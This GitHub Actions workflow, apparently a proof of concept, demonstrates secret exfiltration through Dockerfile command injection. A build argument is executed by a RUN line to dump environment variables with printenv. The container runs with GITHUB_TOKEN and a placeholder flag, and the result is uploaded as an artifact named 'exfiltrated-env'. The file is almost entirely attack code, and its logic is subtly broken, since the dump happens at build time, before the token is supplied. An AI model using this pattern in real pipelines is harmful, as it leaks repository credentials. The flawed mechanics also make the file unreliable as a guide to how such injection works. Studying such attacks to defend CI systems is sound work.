name: Exfil via Dockerfile Injection

on:
  push:
    branches: [ "main" ]

jobs:
  exfil:
    runs-on: ubuntu-latest
    env:
      GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
      SECRET_FLAG: fake-super-secret

    steps:
    - name: Checkout repo
      uses: actions/checkout@v3

    - name: Create Dockerfile
      run: |
        echo 'FROM alpine' > Dockerfile
        echo 'RUN /bin/sh -c "$PYTHON_VERSION"' >> Dockerfile

    - name: Build image with injected command
      run: |
        docker build -t exfil --build-arg PYTHON_VERSION='echo "[ENV]:" > /leaks.txt && printenv >> /leaks.txt' .

    - name: Run container and exfiltrate
      run: |
        docker run --rm -e GITHUB_TOKEN -e SECRET_FLAG exfil sh -c 'cat /leaks.txt' > leaked_env.txt

    - name: Upload exfiltrated data
      uses: actions/upload-artifact@v3
      with:
        name: exfiltrated-env
        path: leaked_env.txt
